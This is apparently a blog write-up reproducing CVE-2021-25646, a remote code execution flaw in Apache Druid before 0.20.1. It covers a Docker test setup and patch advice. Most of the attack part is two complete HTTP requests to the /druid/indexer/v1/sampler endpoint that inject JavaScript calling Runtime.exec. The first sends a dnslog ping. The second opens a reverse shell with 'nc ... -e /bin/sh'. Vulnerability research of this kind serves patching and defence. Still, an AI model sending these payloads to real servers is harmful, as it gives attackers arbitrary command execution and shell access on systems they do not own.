0x00 Preface
The fundamental problem of this vulnerability is a global issue in druid. Developers have made omissions when using Jackson-related tags, allowing attackers to construct incoming json strings to control some sensitive parameters.
Alibaba Cloud Security @Litch1 officially reported the Apache Druid remote code execution vulnerability to Apache
At that time, the vulnerability was known, and for some reason, the extracted poc was not published. I woke up today and saw many official accounts posted. I also summarized, gathered the directors of each company, and wrote a recurring article.
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain a large amount of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
Apache Druid includes code that executes the JavaScript provided by the user and is embedded in various types of requests. This feature is disabled by default when used in a high-trust environment. However, in Druid 0.20.0 and lower versions, authenticated users send malicious requests, exploiting Apache Druid vulnerabilities to execute arbitrary code.
0x01 Affected version
Apache Druid < 0.20.1
0x02 environment construction
I don’t need to write much here. I read what peiqi wrote, just touch it directly, and then reproduce it with actual combat.
Docker download link: https://github.com/apache/druid/archive/druid-0.20.0.zip
After downloading, enter the directory distribution\docker
Execute the command to compile docker-compose up -d
、
0x03 Vulnerability recurrence
1. POC: (POC is mainly tested with dnslog: ping xxxxx.dnslog.cn)
POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 995
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping xxxxx.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
2. Rebound shell: (using nc to rebound)
POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1008
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
Here I did not do the rebound experiment, I just used the picture of peiqi
0x04 repair suggestion
- Upgrade Apache Druid to the latest 0.20.1 version https://github.com/apache/druid/releases/tag/druid-0.20.1
- Perform permission control on Apache Druid, allowing only trusted hosts to access cluster servers
Please indicate: Adminxe's Blog » [Vulnerability Reproduction] Apache Druid remote code execution CVE-2021-25646